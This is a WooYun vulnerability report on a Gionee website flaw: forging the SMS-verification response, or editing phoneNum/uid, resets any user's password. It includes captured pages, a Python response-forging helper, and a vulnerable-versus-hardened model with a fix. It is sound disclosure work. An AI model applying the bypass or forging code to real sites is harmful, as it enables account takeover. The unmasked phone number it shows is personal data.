
Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2015-0119753

Title: Gionee phone official site allows resetting any user's password (tested on the admin account)

Vendor: gionee.com

Author: 路人甲

Submitted: 2015-06-11 13:57

Fixed: 2015-07-27 10:14

Published: 2015-07-27 10:14

Vulnerability type: web design flaw / logic error

Severity: high

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2015-06-11: Details sent to the vendor, awaiting vendor handling
2015-06-12: Vendor confirmed; details disclosed to the vendor only
2015-06-22: Details disclosed to core white hats and relevant domain experts
2015-07-02: Details disclosed to regular white hats
2015-07-12: Details disclosed to intern white hats
2015-07-27: Details disclosed to the public

Brief description:

Can't find a job, will you take me? A soon-to-be unemployed drifter!!!
Have pity on me and give a few more rank points, sob~~~~~~~~~

Detailed description:

0x1: Walk through the correct flow with your own account and record the useful responses.

[screenshot: q.png]


Next, go to the page for obtaining the verification code (as a user with a bound phone number), request the code, enter the correct code, click next and capture the response.

[screenshot: w.png]


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jun 2015 03:06:53 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: zh-CN
Content-Length: 4100
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>找回密码-验证身份</title>
<link href="../static/css/reset.css" rel="stylesheet" type="text/css" />
<link href="../static/css/common_index.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="../favicon.ico" />
<link rel="Bookmark" href="../favicon.ico" />
</head>
<body>
<div id="ma_reg_container">
<div id="ma_reg_header">
<div class="ma_in_header cl">
<a href="http://www.gionee.com/" class="ma_logo z"><img src="../static/images/common/login_logo.png" /></a>
</div>
</div>
<div id="ma_content" class="cl">
<div class="stephd cl">
<h1 class="t1 z">找回密码</h1>
<ul class="step_nav y" id="stepTwo">
<li>填写账户</li>
<li class="on">验证身份</li>
<li>设置新密码</li>
<li class="tow">完成</li>
</ul>
</div>
<div class="w960bx">
<div class="ma_in_reg_content_right">
<ul>
<li class="w3_log_tit mbt10">请选择验证方式:</li>
<li class="ma_login_input_1">
<select class="find_psw_selct" name="methods" id="Jmethod">
<option value="130*****882" type="2">手机</option>
</select>
<input type="hidden" id="Jcss" value="orange" />
<input type="hidden" id="Jservice" value="http://shop.gionee.com/login_success.shtml" />
<li class="w3_log_tit mbt10" id="Jhint">您的手机号码是:130*****882</li>

</ul>
<div class="ma_reg_btn_box">
<button class="ma_reg_btn z" type="button" style="display: none" id="JsetMail">
发送验证邮件
</button>
<button class="ma_reg_btn z" type="button" id="JsetMobile">
发送验证短信
</button>
</div>
</div>
</div>
</div>
</div>
<style>
.ft_white { width: 100%; padding: 10px 0; text-align: center; border-top: #dddddd 1px solid; color: #676767;font-family:"Microsoft Yahei",arial,simsun; line-height: 35px}
.ft_white a{color: #676767}
span.pipe{}
</style>
<div class="ft_white">
<div class="ft_cont">
服务热线:400-779-6666 <span class="pipe">|</span> <a href="/help_detail/63" target="_blank">隐私保护</a> <span class="pipe">|</span> <a href="http://www.gionee.com/op-webmap.shtml" target="_blank">网站地图</a><br/>
Copyright &copy; 2013 深圳市金立通信设备有限公司 版权所有 粤ICP备05087105号
</div>
</div>
<script type="text/javascript" src="../static/js/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="../static/js/core.js"></script>
<script>
(function(){
var domMethod=$id("Jmethod"),domSetMail=$id("JsetMail"),domSetMobile=$id("JsetMobile"),domHint=$id("Jhint");
var css=$id("Jcss").value,service=$id("Jservice").value;

$addEvent (domMethod,"change",function(e){
var value=this.value,type;
for(var i=0,childs=this.childNodes,len=childs.length;i<len;i++){
if(childs[i].value==value){
type=childs[i].getAttribute("type");
}
}
if(type==1){
domSetMail.style.display="block";
domSetMobile.style.display="none";
domHint.innerHTML="您的邮箱是:"+value;
}else{
domSetMail.style.display="none";
domSetMobile.style.display="block";
domHint.innerHTML="您的手机号码是:"+value;
}
});

if(domSetMail){
$addEvent (domSetMail,"click",function(){
$ajaxSendPwdMail({css:css,service:service},function(data){
if(data && data.code==0){
$setCookie("pwdMailTime",(new Date()).getTime());
window.location.href=data.nextlink;
}else{
alert("网络出错");
}
});
});
}
if(domSetMobile){
$addEvent (domSetMobile,"click",function(){
$ajaxSendPwdSms({css:css,service:service},function(data){
if(data && data.code==0){
$setCookie("pwdMobileTime",(new Date()).getTime());
window.location.href=data.nextlink;
}else{
alert("网络出错");
}
});
});
}

})();
</script>
</body>
</html>


[screenshot: e.png]


0x2: After forwarding it, you arrive at the password-reset page.

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jun 2015 03:11:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: zh-CN
Content-Length: 4765
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>找回密码-设置新密码</title>
<link href="../static/css/reset.css" rel="stylesheet" type="text/css" />
<link href="../static/css/common_index.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="../favicon.ico" />
<link rel="Bookmark" href="../favicon.ico" />
</head>
<body>
<div id="ma_reg_container">
<div id="ma_reg_header">
<div class="ma_in_header cl">
<a href="http://www.gionee.com/" class="ma_logo z"><img
src="../static/images/common/login_logo.png" />
</a>
</div>
</div>
<div id="ma_content" class="cl">
<div class="stephd cl">
<h1 class="t1 z">找回密码</h1>
<ul class="step_nav y" id="stepThree">
<li>填写账户</li>
<li>验证身份</li>
<li class="on">设置新密码</li>
<li class="tow">完成</li>
</ul>
</div>
<div class="w960bx">
<div class="ma_in_reg_content_right">
<form action="/cas/n/phoneRestPwd" method="post" onsubmit="return checkForm();">
<ul>
<li class="w3_log_tit mabo20">登录帐号:13080180882</li>
<li class="w3_log_tit mbt10">新登录密码:</li>
<li class="ma_login_input_1"><input name="pwd" id="Jpwd" type="password" maxlength="30" autocomplete="false" htmlEscape="true" /><div class="worm_tips_gray" id="JpwdHint"></div></li>
<li class="w3_log_tit mbt10">确认密码:</li>
<li class="ma_login_input_1"><input name="pwd1" id="Jpwd1" type="password" maxlength="30" autocomplete="false" htmlEscape="true" /><div class="worm_tips_gray" id="Jpwd1Hint"></div></li>
</ul>
<div class="ma_reg_btn_box">
<button class="ma_reg_btn z" id="Jbtn" type="submit">确定</button>
</div>
</form>
</div>
</div>
</div>
</div>
<style>
.ft_white { width: 100%; padding: 10px 0; text-align: center; border-top: #dddddd 1px solid; color: #676767;font-family:"Microsoft Yahei",arial,simsun; line-height: 35px}
.ft_white a{color: #676767}
span.pipe{}
</style>
<div class="ft_white">
<div class="ft_cont">
服务热线:400-779-6666 <span class="pipe">|</span> <a href="/help_detail/63" target="_blank">隐私保护</a> <span class="pipe">|</span> <a href="http://www.gionee.com/op-webmap.shtml" target="_blank">网站地图</a><br/>
Copyright &copy; 2013 深圳市金立通信设备有限公司 版权所有 粤ICP备05087105号
</div>
</div>
<script type="text/javascript" src="../static/js/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="../static/js/md5.js"></script>
<script type="text/javascript" src="../static/js/core.js"></script>
<script>
//(function(){
//校验密码
var domTxt=$id("Jpwd"),domTxt1=$id("Jpwd1");
var reg=/^.{6,30}$/;
var hintMap={
"Jpwd":{
def:"",
focus:"",
empty:"请输入密码",
err:"密码为6-30位",
suc:""
},
"Jpwd1":{
def:"",
focus:"",
empty:"请确认新密码",
err:"密码不一致",
suc:""
}
};
var hintCssMap={
def:"worm_tips_gray",
err:"ma_reg_error"
};
$focusInput(domTxt,"",function(isfocus,isNull){
var domid=domTxt.id;
if(isfocus){
setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
}else{
checkpwd(domid,0,isNull);
}
});
$focusInput(domTxt1,"",function(isfocus,isNull){
var domid=domTxt1.id;
if(isfocus){
setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
}else{
checkpwd(domid,0,isNull);
}
});
function checkpwd(domid,isMust,isNull){
var result=true,value=$.trim($id(domid).value);
isNull=isNull?true:value.length==0;
if(isNull){
if(isMust){
setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].empty);
}else{
setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
}
result=false;
}else{
if(domid=="Jpwd"){
if(value.match(reg)==null){
result=false;
setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].err);
}
}else{
if(value!==$id("Jpwd").value){
result=false;
setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].err);
}
}
}
return result;
}
function checkForm(){
var result=true;
if(!checkpwd("Jpwd",1)){
result=false;
}
if(!checkpwd("Jpwd1",1)){
result=false;
}
if(result){
domTxt.value=hex_md5(domTxt.value);
domTxt1.value=hex_md5(domTxt1.value);
}
return result;
}
function setHint(elem,css,msg){
elem.innerHTML=msg;
elem.className=css;
elem.style.display="block";
}
//})();
</script>
</body>
</html>


[screenshot: r.png]


[screenshot: u.png]


Once you have seen the URL of the password-change page, the verification code is easy to bypass. For any user with a bound phone number, the bound number can be read from the response after entering the username; from it you build the password-change URL and reset the password directly. The root cause is visible in the nextlink /cas/n/phoneRestPwd?phoneNum=...: the reset step identifies the account by a client-supplied parameter and never checks server-side that the SMS verification for that account actually succeeded. That is only one method; below is one for users who have an email bound instead of a phone, or nothing bound at all, tested on admin!

Proof of vulnerability:

0x3: admin test. At the step after the verification code, change the response to the code from 0x1, forward it and see the effect.

[screenshot: q.png]


The user's uid and the password-reset type can be read from the response. Changing the uid resets the password: bind an email to an account of your own and then change the uid at this step (that works as well), or change the reset method at this step directly and reset via phone.

[screenshot: e.png]


0x4: Requesting the verification code fails (admin has no phone bound).

[screenshot: r.png]


{"code":"0","msg":"验证成功","nextlink":"/cas/n/phoneRestPwd?phoneNum=130xxxxxxx82&css=default&service="}


Substitute this successful response (code 0 with the nextlink) for the failed-verification response; see the figure below.

[screenshot: t.png]


This lands on the password-change page; change the password to wooyun123.
0x5: Login verification.

[screenshot: (I1Q6{Z1JZKKN63FBK}R537.png]
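Steps 0x3 and 0x4 above are done by hand in an intercepting proxy: the server's failed-verification reply is replaced with the success JSON captured in the report so that the browser follows nextlink to the reset page. The following is an added example of that rewrite, not tooling from the report or from Gionee. The success body is the one on the page; the failure body, the status line and the header set are constructed, since the report does not show the failure response.

```python
# Added example (not from the original report): rewrite the SMS-code check
# response the way the proxy did in step 0x4. The failure body below is
# constructed; the success JSON is the one captured in the report.
import json
from urllib.parse import parse_qs, urlsplit

SUCCESS_TEMPLATE = {
    "code": "0",
    "msg": "验证成功",
    "nextlink": "/cas/n/phoneRestPwd?phoneNum={phone}&css=default&service=",
}

def forge_verify_response(raw: bytes, phone: str) -> bytes:
    """Return `raw` (a complete HTTP/1.1 response) with its body replaced by
    the success JSON for `phone`. Framing headers are dropped and
    Content-Length recomputed: a stale length makes the browser truncate
    the JSON or wait for bytes that never come."""
    head, sep, _old_body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("not a complete HTTP response")
    status_line, *headers = head.split(b"\r\n")
    body_obj = dict(SUCCESS_TEMPLATE)
    body_obj["nextlink"] = SUCCESS_TEMPLATE["nextlink"].format(phone=phone)
    body = json.dumps(body_obj, ensure_ascii=False,
                      separators=(",", ":")).encode("utf-8")
    kept = [h for h in headers
            if h.split(b":", 1)[0].strip().lower()
            not in (b"content-length", b"transfer-encoding", b"content-encoding")]
    kept.append(b"Content-Length: " + str(len(body)).encode("ascii"))
    return status_line + b"\r\n" + b"\r\n".join(kept) + b"\r\n\r\n" + body

def target_phone(forged: bytes) -> str:
    """Read back which account the forged nextlink points at, i.e. the
    phoneNum the browser will carry to /cas/n/phoneRestPwd."""
    body = json.loads(forged.split(b"\r\n\r\n", 1)[1])
    query = parse_qs(urlsplit(body["nextlink"]).query)
    return query["phoneNum"][0]

# Constructed failure response; the report does not show this body.
FAILED_BODY = b'{"code":"1","msg":"verification failed"}'
FAILED = (b"HTTP/1.1 200 OK\r\nServer: nginx\r\n"
          b"Content-Type: application/json;charset=UTF-8\r\n"
          b"Content-Length: " + str(len(FAILED_BODY)).encode("ascii")
          + b"\r\n\r\n" + FAILED_BODY)

if __name__ == "__main__":
    forged = forge_verify_response(FAILED, "13080180882")
    print(forged.decode("utf-8"))
    print("reset page will target:", target_phone(forged))
```

The server never sees this edit; the forged body only steers the browser. That the reset then succeeds is the actual defect: the reset endpoint trusts the phoneNum in the URL instead of server-side state.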


Fix recommendation:

Do the verification server-side, not only in the front end: the server must record that the SMS check passed for the account chosen at step 1, and the reset step must take the account from that server-side state rather than from the phoneNum or uid supplied by the client.
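The defect explained in the detailed description and the fix suggested above, as an added Python model that is not code from the report or from Gionee. The endpoint name /cas/n/phoneRestPwd, its phoneNum parameter and the {"code":"0","msg":"验证成功","nextlink":...} JSON follow the captured responses; the account store, the session dictionary, the SMS delivery, the try limit and the ten-minute validity window are assumptions made for the example. The admin variant (swapping uid and reset type) is not modelled because the report does not show those parameters; it is the same class of defect, an account identifier taken from the client.

```python
# Added example, not Gionee's code: a minimal model of the three-step reset
# flow from the report, with the server-side defect the bypass relies on next
# to a hardened version. Endpoint and JSON shapes follow the captured
# responses; everything else (store, session, SMS, limits) is assumed.
import hashlib
import secrets
import time

# Constructed account store (username -> record). "pwd" holds the MD5 the
# page's form submits (checkForm() applies hex_md5 before POSTing).
ACCOUNTS = {
    "13080180882": {"uid": 1001, "phone": "13080180882", "pwd": None},
    "admin":       {"uid": 1,    "phone": None,          "pwd": None},
}
SMS_CODES = {}          # phone -> {"code": str, "tries": int}  (assumed storage)
MAX_TRIES = 3           # assumed limit on wrong codes per sent SMS
RESET_TTL = 600         # assumed seconds a passed verification stays usable

def send_sms(phone):
    """'Sends' a 6-digit code; returned only so a test can play the victim."""
    code = f"{secrets.randbelow(10**6):06d}"
    SMS_CODES[phone] = {"code": code, "tries": 0}
    return code

# ---- vulnerable flow: what the report's behaviour implies ----
def vuln_verify(phone, code):
    """Step 2. The verdict only goes back to the browser; nothing is
    recorded server-side, so forging this JSON in a proxy is enough."""
    entry = SMS_CODES.get(phone)
    if entry and entry["code"] == code:
        return {"code": "0", "msg": "验证成功",
                "nextlink": f"/cas/n/phoneRestPwd?phoneNum={phone}&css=default&service="}
    return {"code": "1", "msg": "验证码错误"}   # constructed failure body

def vuln_phone_reset(phone_num, pwd_md5):
    """Step 3 as /cas/n/phoneRestPwd: the account is chosen by the
    client-supplied phoneNum and step 2 is never consulted, so anyone who
    knows the URL can call this directly (the report's first method)."""
    for acct in ACCOUNTS.values():
        if acct["phone"] == phone_num:
            acct["pwd"] = pwd_md5
            return True
    return False

# ---- hardened flow: verification state lives only in the server session ----
def hard_start(session, username):
    """Step 1 pins the account in the session; later steps never read an
    account identifier from the request again."""
    if username not in ACCOUNTS:
        return False
    session.clear()
    session["reset_user"] = username
    return True

def hard_verify(session, code):
    """Step 2 checks the code against the pinned account, counts tries,
    burns the code on success and records the success server-side."""
    acct = ACCOUNTS.get(session.get("reset_user"))
    if not acct or not acct["phone"]:
        return {"code": "1", "msg": "no verification method bound"}   # admin case
    entry = SMS_CODES.get(acct["phone"])
    if entry is None or entry["tries"] >= MAX_TRIES:
        return {"code": "1", "msg": "code expired"}
    entry["tries"] += 1
    if not secrets.compare_digest(entry["code"], code):
        return {"code": "1", "msg": "验证码错误"}
    del SMS_CODES[acct["phone"]]                   # single use
    session["reset_verified_at"] = time.time()
    return {"code": "0", "msg": "验证成功", "nextlink": "/cas/n/phoneRestPwd"}

def hard_phone_reset(session, pwd_md5):
    """Step 3 ignores phoneNum/uid from the request entirely and requires a
    fresh, unused verification for the account pinned at step 1."""
    verified_at = session.pop("reset_verified_at", None)
    user = session.pop("reset_user", None)
    if verified_at is None or user not in ACCOUNTS:
        return False
    if time.time() - verified_at > RESET_TTL:
        return False
    ACCOUNTS[user]["pwd"] = pwd_md5
    return True

def attacker_demo():
    """Replays the report against both flows with no SMS code at all:
    the vulnerable endpoint takes the reset, the hardened one refuses."""
    new_md5 = hashlib.md5(b"wooyun123").hexdigest()
    took_vuln = vuln_phone_reset("13080180882", new_md5)
    took_hard = hard_phone_reset({"reset_user": "13080180882"}, new_md5)
    return took_vuln, took_hard

if __name__ == "__main__":
    print("vulnerable reset taken, hardened reset taken:", attacker_demo())
```

The hardened version changes nothing about the SMS itself; the difference is where the verdict lives. Because the account is fixed in the session at step 1 and the reset endpoint reads only that session state, a forged {"code":"0"} reply or a hand-built phoneNum URL gives the browser a page it cannot use.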

Copyright notice: when reprinting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: medium

Rank: 10

Confirmed: 2015-06-12 10:13

Vendor reply:

Thanks for your contribution to Gionee's security

Latest status:

None